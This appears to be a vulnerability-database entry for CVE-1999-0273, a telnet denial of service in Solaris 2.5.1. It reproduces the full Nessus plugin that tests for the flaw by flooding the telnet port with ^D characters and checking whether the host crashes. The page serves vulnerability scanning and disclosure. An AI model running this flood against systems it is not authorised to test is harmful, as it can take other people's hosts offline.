Vulnerabilities > CVE-1999-0273 - Unspecified vulnerability in SUN Sunos 5.5.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
sun
nessus

Summary

Denial of service through Solaris 2.5.1 telnet by sending ^D characters.

Vulnerable Configurations

Part Description Count
OS
Sun
1

Nessus

NASL familyDenial of Service
NASL idSUNKILL.NASL
descriptionIt was possible to make the remote Sun crash by flooding it with ^D characters instead of entering our login. This flaw allows an attacker to prevent your network from working properly.
last seen2020-06-01
modified2020-06-02
plugin id10272
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10272
titleSolaris ^D Character Remote Telnet Service DoS
code
#
# (C) Tenable Network Security, Inc.
#

# "SunKill"

include("compat.inc");

if (description)
{
  script_id(10272);
  script_version("1.30");
  script_cvs_date("Date: 2018/11/15 20:50:21");

  script_cve_id("CVE-1999-0273");

  script_name(english:"Solaris ^D Character Remote Telnet Service DoS");
  script_summary(english:"Crashes the remote Sun host");

  script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to denial of service.");
  script_set_attribute(attribute:"description", value:
"It was possible to make the remote Sun crash by flooding it with ^D
characters instead of entering our login.

This flaw allows an attacker to prevent your network from working
properly.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1997/Dec/71");
  script_set_attribute(attribute:"solution", value:
"Upgrade your telnet server and filter the incoming traffic to this
port.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

  script_set_attribute(attribute:"vuln_publication_date", value:"1998/01/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:sun:solaris");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
  script_family(english:"Denial of Service");

  script_dependencie("find_service1.nasl", "wingate.nasl");
  script_exclude_keys("wingate/enabled");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports(23, "Services/telnet");

  exit(0);
}


# Wingate doesnt establish properly the telnet
# session, so if we know that we are facing it,
# we go away

include("audit.inc");
include("global_settings.inc");
include("telnet_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

wingate = get_kb_item("wingate/enabled");
if(wingate)exit(0);

port = get_kb_item("Services/telnet");
if(!port)port = 23;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  c = telnet_negotiate(socket:soc);
  d = raw_string(0x04);
  data = crap(length:2550, data:d);
  send(socket:soc, data:data);
  close(soc);
  soc2 = NULL;
  for (i = 0; i < 3 && ! soc2; i ++)
  {
    sleep(i);
    soc2 = open_sock_tcp(port);
  }
  if(!soc2){
  	set_kb_item(name:"Host/dead", value:TRUE);
	security_warning(port);
	}
  else close(soc2);
  }
}